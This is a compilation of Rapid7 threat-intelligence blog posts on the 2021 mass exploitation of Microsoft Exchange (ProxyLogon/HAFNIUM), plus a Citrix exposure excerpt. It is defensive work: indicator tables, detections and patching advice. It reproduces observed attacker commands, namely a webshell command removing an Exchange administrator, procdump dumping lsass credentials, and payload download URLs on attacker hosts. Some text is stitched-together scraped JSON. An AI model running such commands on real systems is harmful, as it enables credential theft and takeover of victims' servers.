Continuing to analyze post-compromise attacker behavior to develop detections greatly increases the likelihood of being notified of a breach, regardless of the method used to obtain initial access to the victim environment.
Additionally, these detections have longer lifespans and can be made available more quickly than most indicators of compromise shared in other public reporting.

### Observed CVEs employed by attackers:

CVE | Description
---|---
CVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html>
CVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>
CVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>
CVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>
CVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>

### Observed IOCs employed by all attackers:

Type | Value
---|---
FQDN | estonine.com
FQDN | p.estonine.com
FQDN | ipinfo.io
Filepath | C:\inetpub\wwwroot\aspnet_client\
Filepath | C:\inetpub\wwwroot\aspnet_client\system_web\
Filepath | C:\Program Files\Microsoft\Exchange Server\V15\Bin\
Filepath | c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\
Filepath | C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
Filepath | C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\
Filepath | C:\Programdata\
Filepath | C:\ProgramData\COM\zfwqn\
Filepath | C:\root\
Filepath | C:\Users\Public\
Filepath | C:\Users\Public\Opera\
Filepath | C:\Windows\temp\
Filename | 1.txt
Filename | 2.bat
Filename | 3.avi
Filename | b.log
Filename | c103w-at.zip
Filename | client32.exe
Filename | code
Filename | curl.exe
Filename | demo.dll
Filename | discover.aspx
Filename | dsf.exe
Filename | error.aspx
Filename | ErrorFF.aspx
Filename | exshell.psc1
Filename | Flogon.aspx
Filename | lsass.dump
Filename | m103w.zip
Filename | nvidia.msi
Filename | opera_browser.dll
Filename | opera_browser.exe
Filename | opera_browser.png
Filename | OutlookEN.aspx
Filename | MonitoringLog.cmd
Filename | MonitoringLog.exe
Filename | p
Filename | procdump64.exe
Filename | Service.Information.rtf
Filename | TimeoutLogout.aspx
Filename | script1.ps1
Filename | test.bat
IP Address | 178.162.217.107
IP Address | 178.162.203.202
IP Address | 178.162.203.226
IP Address | 85.17.31.122
IP Address | 5.79.71.205
IP Address | 5.79.71.225
IP Address | 178.162.203.211
IP Address | 85.17.31.82
IP Address | 86.105.18.116
IP Address | 198.98.61.152
IP Address | 89.34.111.11
MD5 | 7a6c605af4b85954f62f35d648d532bf
MD5 | e1ae154461096adb5ec602faad42b72e
MD5 | b3df7f5a9e36f01d0eb0043b698a6c06
MD5 | c60ac6a6e6e582ab0ecb1fdbd607705b
MD5 | 42badc1d2f03a8b1e4875740d3d49336
MD5 | c515107d75563890020e915f54f3e036
SHA1 | 02886f9daa13f7d9855855048c54f1d6b1231b0a
SHA1 | c7f68a184df65e72c59403fb135924334f8c0ebd
SHA1 | ab32d4ec424b7cd30c7ace1dad859df1a65aa50e
SHA1 | ba9de479beb82fd97bbdfbc04ef22e08224724ba
SHA1 | cee178da1fb05f99af7a3547093122893bd1eb46
SHA1 | 2fed891610b9a770e396ced4ef3b0b6c55177305
SHA-256 | b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff
SHA-256 | d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09
SHA-256 | bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6
SHA-256 | 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87
SHA-256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
SHA-256 | 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26
URL | `http://103.212.223.210:9900/nvidia.msi`
URL | `http://86.105.18.116/news/code`
URL | `http://86.105.18.116/news/opera_browser.dll`
URL | `http://86.105.18.116/news/opera_browser.exe`
URL | `http://86.105.18.116/news/opera_browser.png`
URL | `http://89.34.111.11/3.avi`
URL | `http://microsoftsoftwaredownload.com:8080/c103w-at.zip`
URL | `http://microsoftsoftwaredownload.com:8080/m103w.zip`
URL | `http://p.estonine.com/p?e`
URL | `http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn`
URL | `http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn`

### References:

 * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>
 * <https://aka.ms/ExchangeVulns>
 * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>
 * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>
 * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>
 * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>

_Source: Rapid7 blog, “Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange”, published 2021-03-23, <https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/>. CVEs referenced: CVE-2018-18913, CVE-2019-19781, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065._

# Rapid7’s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day

Starting February 27,
2021, Rapid7 has observed a notable increase in the exploitation of Microsoft Exchange through existing detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)’s Attacker Behavior Analytics (ABA). The Managed Detection and Response (MDR) team identified multiple related compromises in the past 72 hours. In most cases, the attacker is uploading an “eval” webshell, commonly referred to as a “chopper” or “China chopper”. With this foothold, the attacker then uploads and executes tools, often for the purpose of stealing credentials. Further investigative efforts have identified overlap in attacker techniques and infrastructure.

## Summary

At close to midnight UTC on February 27, 2021, Managed Detection and Response SOC analysts began observing alerts for the following ABA detections in InsightIDR:

 * Attacker Tool - China Chopper Webshell Executing Commands
 * Attacker Technique - ProcDump Used Against LSASS

Upon further inspection of [Enhanced Endpoint Telemetry](<https://blog.rapid7.com/2020/10/15/introducing-enhanced-endpoint-telemetry-eet-in-insightidr/>) data produced by InsightAgent, Rapid7 analysts identified that attackers had successfully compromised several systems and noted that they were all on-premise Microsoft Exchange servers with web services accessible from the public Internet. Exposing web services to the public internet is common practice for customers with on-premise instances of Microsoft Exchange, as it provides their users with email over the web through Outlook Web Access (OWA).

Using Project Sonar, Rapid7's Labs team was able to identify how target-rich an environment attackers have to work with: nearly 170,000 servers vulnerable to a different recent Exchange CVE (for which [proof-of-concept exploit code](<https://github.com/sourceincite/CVE-2021-24085>) is readily available) were exposed to the public internet.

With the compromise identified, our team of Customer Advisors alerted our customers to this activity. Meanwhile, our analysts quickly began performing deeper inspection of the logs uploaded to InsightIDR and collecting additional forensic information directly from the compromised endpoints. Within a very short period of time, our analysts were able to identify how the attackers were executing commands, where they were coming from, and what tools they were using. This information allowed Rapid7 to provide proactive, actionable steps to our customers to thwart the attack. Additionally, our analysts worked jointly with our Threat Intelligence and Detection Engineering (TIDE) team to review the collected data for the purpose of immediately developing and deploying additional detections for customers.

Three days later, on March 2, 2021, Microsoft acknowledged and [released information](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on the exploitation of 0-day vulnerabilities in Microsoft Exchange by an actor they refer to as "hafnium." They also released patches for Microsoft Exchange 2013, 2016 and 2019 ([CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), as well as others).

Despite this vulnerability being unknown to the public, Rapid7 was able to identify the attacker's presence on systems and help defend against the use of these 0-day exploits with our Attacker Behavior Analytics library.

**Rapid7 recommends that everyone running Microsoft Exchange apply these patches immediately as they are being exploited in the wild by a sophisticated adversary.**

## Technical Analysis of Attacker Activity

1. Automated scanning to discover vulnerable Exchange servers from the following DigitalOcean IP addresses:
   * 165.232.154.116
   * 157.230.221.198
   * 161.35.45.41

2. Analysis of Internet Information Services (IIS) logs shows that a POST request is then made from the scanning DigitalOcean IP to multiple paths and files:
   * /ecp/y.js
   * /rpc/
   * /owa/auth/signon.aspx
   * /aspnet_client/system_web/<random_name>.aspx
     * IIS path example: /aspnet_client/system_web/TInpB9PE.aspx
     * File system path example: C:\inetpub\wwwroot\aspnet_client\system_web\TInpB9PE.aspx
   * /aspnet_client/aspnet_iisstart.aspx
     * File system path: C:\inetpub\wwwroot\aspnet_client\aspx_iisstart.aspx
   * /aspnet_client/aspx_client.aspx
     * File system path: C:\inetpub\wwwroot\aspnet_client\aspx_client.aspx
   * /aspnet_client/aspnet.aspx
     * File system path: C:\inetpub\wwwroot\aspnet_client\aspnet.aspx

   In some cases, additional dynamic link libraries (DLLs) and compiled aspx files are created shortly after the webshells are first interacted with via POST requests, in the following locations:
   * C:\Windows\Microsoft.NET\Framework64\<version>\Temporary ASP.NET Files\root\
   * C:\Windows\Microsoft.NET\Framework64\<version>\Temporary ASP.NET Files\owa\

3. Next, a command executes, attempting to delete the “Administrator” from the “Exchange Organization administrators” group:
   * `cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]`

4. With the command executed and the webshell successfully uploaded, interaction with the webshell begins from a different IP.
   * We have monitored interaction from 45.77.252[.]175

5. Following the POST request, multiple commands are executed on the asset:

   a. Lsass.exe dumping using procdump64.exe and C:\Temp\update.exe (MD5: [f557a178550733c229f1087f2396f782](<https://www.virustotal.com/gui/file/173ac2a1f99fe616f5efa3a7cf72013ab42a68f7305e24ed795a98cb08046ee1/detection>)):
   * `cmd /c cd /d C:\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]`

   b. Reconnaissance commands:
   * whoami.exe
   * ping.exe
   * tasklist.exe
   * quser.exe
   * query.exe

## Indicators of Compromise (IOCs)

Type | Value
---|---
IP Address | 165.232.154.116
IP Address | 157.230.221.198
IP Address | 161.35.45.41
IP Address | 45.77.252.175
IP Address | 104.248.49[.]97
IP Address That Interacts with Uploaded Webshells | 194.87.69[.]35
URL | /ecp/y.js
URL | /ecp/DDI/DDIService.svc/GetList
URL | /ecp/DDI/DDIService.svc/SetObject
URL | /owa/auth/errorEE.aspx
URL | /owa/auth/logon.aspx
URL | /owa/auth/errorFE.aspx
URL | /aspnet_client/aa.aspx
URL | /aspnet_client/iis
URL | /iistart.aaa
URL | /owa/iistart.aaa
User Agent | python-requests/2.25.1
User Agent | antSword/v2.1

## References

 * <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>
 * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>
 * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>
 * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>
 * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>
 * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>
 * <https://github.com/microsoft/CSS-Exchange/tree/main/Security>

## Update: March 7, 2021

Microsoft [published tools](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) to help identify servers potentially compromised by [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).
Upon review of the checks within the tools, Rapid7 identified the following additional pre-existing detections within InsightIDR’s Attacker Behavior Analytics that would have alerted customers to this malicious actor in their environment:

 * Attacker Technique - PowerShell New-MailboxExportRequest (Created March 14, 2019)
 * Attacker Technique - PowerShell Remove-MailboxExportRequest (Created Dec. 15, 2020)
 * Attacker Technique - Compressing Mailbox With 7zip (Created Dec. 15, 2020)
 * Attacker Technique - PowerShell Download Cradles (Created Jan. 3, 2019)

These previously existing detections are based on attacker behavior observed by our Incident Response (IR), Managed Detection and Response, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration across the Detection and Response practice, we help ensure our clients continue to have coverage for the latest techniques being used by malicious actors.

## Update: March 18, 2021

Widespread [exploitation of vulnerable on-premises Exchange servers](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) is ongoing. Microsoft has released a "One-Click Exchange On-premises Mitigation Tool" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended "to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>

We continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.

_We'd like to extend a huge thank-you to everyone who helped contribute to this blog post:_

 * _Robert Knapp_
 * _Shazan Khaja_
 * _Lih Wern Wong_
 * _Tiffany Anders_
 * _Andrew Iwamaye_
 * _Rashmi Joshi_
 * _Daniel Lydon_
 * _Dan Kelly_
 * _Carlo Anez Mazurco_
 * _Eoin Miller_
 * _Charlie Stafford_
 * _The Rapid7 MVM Team_

_Source: Rapid7 blog, “Rapid7’s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day”, published 2021-03-03, <https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>. CVEs referenced: CVE-2021-24085, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065._

On March 2, 2021, the Microsoft Threat Intelligence Center (MSTIC) [released details on an active state-sponsored threat campaign](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group “assessed to be state-sponsored and operating out of China.”

Rapid7 detection and response teams [have also observed increased threat activity](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>) against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers **should apply the latest updates on an emergency basis** and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of [IOCs available here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>).

The actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:

 * **[CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)**, also known as [ProxyLogon](<https://proxylogon.com/>), is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." More information and a disclosure timeline are available at <https://proxylogon.com>.
 * **[CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
 * **[CVE-2021-26857](<https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857?referrer=blog>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization occurs when untrusted, user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.
 * **[CVE-2021-26858](<https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

Also included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:

 * **[CVE-2021-26412](<https://attackerkb.com/topics/mgKIUMCadN/cve-2021-27078?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)
 * **[CVE-2021-26854](<https://attackerkb.com/topics/KxXhEt74SK/cve-2021-26412?referrer=blog>)** (CVSS:3.0 6.6 / 5.8)
 * **[CVE-2021-27078](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)

Microsoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021.
Security updates are available for the following specific versions of Exchange:\n\n * Exchange Server 2010 (for Service Pack 3\u2014this is a Defense in Depth update)\n * Exchange Server 2013 (CU 23)\n * Exchange Server 2016 (CU 19, CU 18)\n * Exchange Server 2019 (CU 8, CU 7)\n\nExchange Online is not affected.\n\n## For Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.\n\nInsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, [install the Insight Agent](<https://docs.rapid7.com/insight-agent/install/>) on your Exchange Servers.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=blog#rapid7-analysis>).\n\n## Updates\n\n**Update March 18, 2021:** Microsoft has released a "One-Click Exchange On-premises Mitigation Tool" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended "to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. 
See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 15, 2021:** There are now multiple reports of [ransomware](<https://twitter.com/phillip_misner/status/1370197696280027136>) being used after initial compromise of unpatched Exchange servers. Microsoft [has confirmed](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) that it is detecting and blocking a new ransomware strain it calls DearCry. On-premises Exchange customers should continue to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 7, 2021:** Widespread [exploitation and compromise](<https://twitter.com/GossiTheDog/status/1366894548593573893>) of Exchange servers is ongoing. CISA, the U.S. Cybersecurity and Infrastructure Agency, [said on March 6, 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that they are "aware of widespread domestic and international exploitation of these vulnerabilities." Microsoft has [published a script](<https://github.com/microsoft/CSS-Exchange/blob/cb550e399bc2785e958472e533147826e2b6bf24/Security/Test-ProxyLogon.ps1>) to help identify some vulnerable versions of Exchange. Because there is [some potential for false negatives](<https://github.com/microsoft/CSS-Exchange/issues/107>), we recommend using this script as a supporting tool rather than as a primary way of confirming vulnerability. Defenders should check the version of Exchange they're running and compare against the known vulnerable versions Microsoft has identified. 
(Those running older, unsupported versions of Exchange should consider updating as a best practice.)\n\nOn-premises Exchange administrators should continue to treat this widespread threat as an incident response scenario and examine their environments for signs of compromise. Rapid7 has [a list of IOCs here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>), which we will continue to update as new information becomes available. Microsoft has also released [an updated script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that scans Exchange log files for IOCs associated with the vulnerabilities disclosed on March 2, 2021.", "cvss3": {}, "published": "2021-03-03T19:23:42", "type": "rapid7blog", "title": "Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T19:23:42", "id": "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "href": "https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-02T21:07:58", "description": "\n\n_The following blog post was co-authored by Andrew Christian and Brendan Watters._\n\nBeginning Feb. 27, 2021, [Rapid7\u2019s Managed Detection and Response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) team has observed a notable increase in the automated exploitation of vulnerable Microsoft Exchange servers to upload a webshell granting attackers remote access. 
The suspected vulnerability being exploited is a [cross-site request forgery (CSRF) vulnerability](<https://www.rapid7.com/fundamentals/cross-site-request-forgery/>): The likeliest culprit is [CVE-2021-24085](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24085>), an Exchange Server spoofing vulnerability released as part of Microsoft\u2019s February 2021 Patch Tuesday advisory, though other CVEs may also be at play (e.g., CVE-2021-26855, CVE-2021-26865, CVE-2021-26857).\n\nThe following China Chopper command was observed multiple times beginning Feb. 27 using the same DigitalOcean source IP (165.232.154.116):\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nExchange or other systems administrators who see this command\u2014or any other China Chopper command in the near future\u2014should look for the following in IIS logs:\n\n * 165.232.154.116 (the source IP of the requests)\n * `/ecp/y.js`\n * `/ecp/DDI/DDIService.svc/GetList`\n\nIndicators of compromise (IOCs) from the attacks we have observed are consistent with IOCs for [publicly available exploit code targeting CVE-2021-24085](<https://github.com/sourceincite/CVE-2021-24085>) released by security researcher [Steven Seeley](<https://twitter.com/steventseeley>) last week, shortly before indiscriminate exploitation began. After initial exploitation, attackers drop an ASP eval webshell before (usually) executing `procdump` against `lsass.exe` in order to grab all the credentials from the box. It would also be possible to then clean some indicators of compromise from the affected machine[s]. 
We have included a section on CVE-2021-24085 exploitation at the end of this document.\n\nExchange servers are frequent, [high-value attack targets](<https://attackerkb.com/search?q=exchange>) whose patch rates often [lag behind attacker capabilities](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>). Rapid7 Labs has identified nearly 170,000 Exchange servers vulnerable to CVE-2021-24085 on the public internet:\n\n\n\n**Rapid7 recommends that Exchange customers apply Microsoft\u2019s February 2021 updates immediately.** InsightVM and Nexpose customers can [assess their exposure to CVE-2021-24085](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-24085/>) and other February Patch Tuesday CVEs with vulnerability checks. InsightIDR provides existing coverage for this vulnerability via our out-of-the-box China Chopper Webshell Executing Commands detection, and will alert you about any suspicious activity. [View this detection](<https://docs.rapid7.com/insightidr/windows-suspicious-process/#attacker-tool>) in the Attacker Tool section of the InsightIDR Detection Library.\n\n## CVE-2021-24085 exploit chain\n\nAs part of the [PoC](<https://github.com/sourceincite/CVE-2021-24085>) for CVE-2021-24085, the attacker will search for a specific token using a request to `/ecp/DDI/DDIService.svc/GetList`. If that request is successful, the PoC moves on to writing the desired token to the server\u2019s filesystem with the request `/ecp/DDI/DDIService.svc/SetObject`. At that point, the token is available for downloading directly. 
The PoC uses a download request to `/ecp/poc.png` (though the name could be anything) and may be recorded in the IIS logs themselves attached to the IP of the initial attack.\n\nIndicators of compromise would include the requests to both `/ecp/DDI/DDIService.svc/GetList` and `/ecp/DDI/DDIService.svc/SetObject`, especially if those requests were associated with an odd user agent string like `python`. Because the PoC utilizes SetObject to write the token to the server\u2019s filesystem in a world-readable location, it would be beneficial for incident responders to examine any files that were created around the time of the requests, as one of those files could be the access token and should be removed or placed in a secure location. It is also possible that responders could discover the file name in question by checking to see if the original attacker\u2019s IP downloaded any files.", "cvss3": {}, "published": "2021-03-02T19:53:28", "type": "rapid7blog", "title": "Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2021-03-02T19:53:28", "id": "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "href": "https://blog.rapid7.com/2021/03/02/indiscriminate-exploitation-of-microsoft-exchange-servers-cve-2021-24085/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-11-04T16:45:52", "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. 
The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n## Citrix ADC/NetScaler (TCP/Various)\n\n_It's like VNC, but like if Plan9 ever escaped Bell Labs and got super popular._\n\n### TLDR\n\n**WHAT IT IS:** A client/server technology\u2014similar to Microsoft Remote Desktop\u2014that provides remote access to applications and/or entire operating system desktop environments.\n\n**HOW MANY:** 62,998 discovered nodes. 62,998 (100%) have Recog service version fingerprints.\n\n**VULNERABILITIES:** Tons! Most recently, a [severe, unauthenticated remote code execution vulnerability](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>) has been widely exploited since January 2020.\n\n**ADVICE:** Use it! But, keep it patched and use multi-factor authentication.\n\n**ALTERNATIVES:** Microsoft Remote Desktop, VNC, and other similar solutions used behind a well-oiled VPN.\n\nCitrix was founded in 1989 and has offered a diverse array of remote access solutions over the years. Modern Citrix ADC (application delivery controller) and NetScaler solutions use the Microsoft Remote Desktop Services infrastructure to deliver virtual applications and desktops to remote users. 
Organizations have the ability to configure stronger access controls than with vanilla Remote Desktop, and there are other optimizations within the Citrix application delivery process that also make it faster and consume less bandwidth than raw Remote Desktop sessions.\n\n### Discovery details\n\nIdentifying Citrix systems on the internet turns out to be pretty easy, since their HTTP and NTP servers [kind of go out of their way](<https://github.com/rapid7/recog/search?q=citrix&unscoped_q=citrix>) to proudly let you know they are, indeed, Citrix systems. This makes it easy for Rapid7 Labs researchers to track the spread of Citrix systems on the internet, and in March 2020, we also developed a method to fingerprint the server version based on the version fingerprint of the Citrix client that is offered for download (again, Citrix going out of its way to help folks identify their systems).\n\nThe Labs team spent time on this effort because attackers keep compromising systems that haven\u2019t patched a [gnarly remote code execution vulnerability](<https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781>), and we have many in-flight projects set up to model patch adoption rates of various technologies.\n\nUnlike many other top 10 country lists in this report, China failed to even beat out Sweden in their internet-facing exposure of Citrix systems.\n\n\n\nThe lack of Citrix in cloud environments makes sense, since this technology is usually associated with virtual desktop infrastructure (VDI), which is almost exclusively found in enterprise/business environments.\n\n### Exposure information\n\nWith an actively exploited vulnerability in play and [regular government warnings](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) about the situation, you\u2019d likely guess that internet-facing Citrix servers were fully patched or had mitigations in place. 
And, you\u2019d be wrong (again), but this time, the situation isn\u2019t as grim as you might expect.\n\nOur version fingerprinting technique showed that 73% of internet-facing Citrix systems have patches or mitigations in place, with the remaining 27% either being vulnerable or woefully outdated (thus having other issues to worry about). It has taken five months to get to a patch rate of 73%.\n\n### Attacker\u2019s view\n\nThe vast majority of our Heisenberg honeypot nodes are in cloud environments, and\u2014as we\u2019ve just seen\u2014clouds are not where Citrix tends to live (at least on public internet cloud segments). Back in January, we caught attackers and researchers looking for exploitable systems quite regularly, but that activity has waned (though it hasn\u2019t stopped).\n\nOur honeypots do not emulate Citrix, so the lack of activity is more likely due to our nodes being ignored after each attacker inventory scan. Attackers may also be reusing initial inventory lists or have already established a foothold on the thousands of systems that took forever to be patched.\n\n### Our advice\n\n**IT and IT security teams** should relentlessly monitor vendor bulletins and CVE reports and patch Citrix environments as soon as possible. With attackers increasingly targeting remote access technologies over the past 18 months, it would also be a good idea to have enhanced monitoring with more detailed logging set up on these systems. 
